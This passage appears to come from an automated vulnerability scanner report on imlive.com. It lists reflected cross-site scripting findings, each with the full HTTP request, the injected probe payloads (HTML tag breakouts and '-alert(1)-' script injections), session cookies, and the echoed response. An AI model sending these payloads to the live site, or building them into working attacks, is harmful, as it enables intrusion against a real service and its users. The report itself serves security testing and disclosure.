GET /localcompanionship.asp?d9f12'><a>f87a2832891=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:12 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:12 GMT Connection: close Content-Length: 16579 Vary: Accept-Encoding
<html> <head> <title>Friends & Romance on Webcam Video Chat at ImLive</title> <meta name="description" content="Like shopping? Go out to restaurants? Find your soul mate on live webcam vid ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/localcompanionship.asp?d9f12'><a>f87a2832891=1&lr=1107816009&ud=0&pe=localcompanionship.asp&qs=d9f12'> ...[SNIP]...
2.125. http://imlive.com/minglesingles.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /minglesingles.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1a452'><a>a6955adbf25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /minglesingles.asp?1a452'><a>a6955adbf25=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:10 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:10 GMT Connection: close Content-Length: 16143 Vary: Accept-Encoding
<html> <head> <title>Mingle With Friends on Live Webcam Video Chat at ImLive</title> <meta name="description" content="Mingle with Singles on live webcam video chat - Find a match and go on ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/minglesingles.asp?1a452'><a>a6955adbf25=1&lr=1107816009&ud=0&pe=minglesingles.asp&qs=1a452'> ...[SNIP]...
2.126. http://imlive.com/pr.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /pr.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 90148'><a>2e9c3e6d159 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /pr.asp?90148'><a>2e9c3e6d159=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:18 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:18 GMT Connection: close Content-Length: 9886 Vary: Accept-Encoding
2.127. http://imlive.com/preparesearch.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /preparesearch.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad584"><a>5bd7ab7e3b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /preparesearch.asp?ad584"><a>5bd7ab7e3b0=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/preparesearch.aspx?ad584"><a>5bd7ab7e3b0=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.128. http://imlive.com/preparesearch.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /preparesearch.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cf17'-alert(1)-'f7758fd0154 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /preparesearch.asp?1cf17'-alert(1)-'f7758fd0154=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/preparesearch.aspx&he=imlive.com&ul=/preparesearch.aspx?1cf17'-alert(1)-'f7758fd0154=1&qs=1cf17'-alert(1)-'f7758fd0154=1&qs=1cf17'-alert(1)-'f7758fd0154=1&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function ...[SNIP]...
2.129. http://imlive.com/preparesearch.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /preparesearch.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aed33"><a>4a10453e31b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /preparesearch.aspx?aed33"><a>4a10453e31b=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:56 GMT Connection: close Content-Length: 19417 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/preparesearch.aspx?aed33"><a>4a10453e31b=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.130. http://imlive.com/preparesearch.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /preparesearch.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ac9b'-alert(1)-'0d66f31204c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /preparesearch.aspx?8ac9b'-alert(1)-'0d66f31204c=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:25:00 GMT Connection: close Content-Length: 19578 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/preparesearch.aspx&he=imlive.com&ul=/preparesearch.aspx?8ac9b'-alert(1)-'0d66f31204c=1&qs=8ac9b'-alert(1)-'0d66f31204c=1&qs=8ac9b'-alert(1)-'0d66f31204c=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function ...[SNIP]...
2.131. http://imlive.com/sitemap.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /sitemap.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1979b'><a>18155b4088b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sitemap.html?1979b'><a>18155b4088b=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:24:32 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/ Set-Cookie: ix=k; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:32 GMT Connection: close Content-Length: 33756 Vary: Accept-Encoding
<html> <head> <meta name="keywords" content="live Video Chat, Video Chat live, Video Chat live, live Video Chat, webcam chat, live web cam, webcam live, live webcam, web cam live, web cam communti ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/sitemap.html?1979b'><a>18155b4088b=1&lr=1107816008&ud=0&pe=sitemap.asp&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'> ...[SNIP]...
2.132. http://imlive.com/videosfr.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /videosfr.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f44ce'><a>23f9fd95641 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videosfr.asp?f44ce'><a>23f9fd95641=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:12 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:13 GMT Connection: close Content-Length: 15757 Vary: Accept-Encoding
<html> <head> <title>Video Chat Recorded on Webcam at ImLive</title> <meta name="description" content="Come in and discover what our hosts have recorded in Friends & Romance live webcam vide ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/videosfr.asp?f44ce'><a>23f9fd95641=1&lr=1107816009&ud=0&pe=videosfr.asp&qs=f44ce'> ...[SNIP]...
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2a49'-alert(1)-'2edefc94fdc was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /warningjx.aspx?redirect=/e2a49'-alert(1)-'2edefc94fdc HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:33 GMT Connection: close Content-Length: 2375 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> War ...[SNIP]... <script type="text/javascript"> function IAgree(){document.location.href='?meAgree=yes&redirect=%2fe2a49'-alert(1)-'2edefc94fdc'; return false;} function IDontAgree() { window.parent.location.href = "/"; return false; } </script> ...[SNIP]...
The value of the ms request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5576b'><a>7cdefc4b49a was submitted in the ms parameter. This input was echoed unmodified in the application's response.
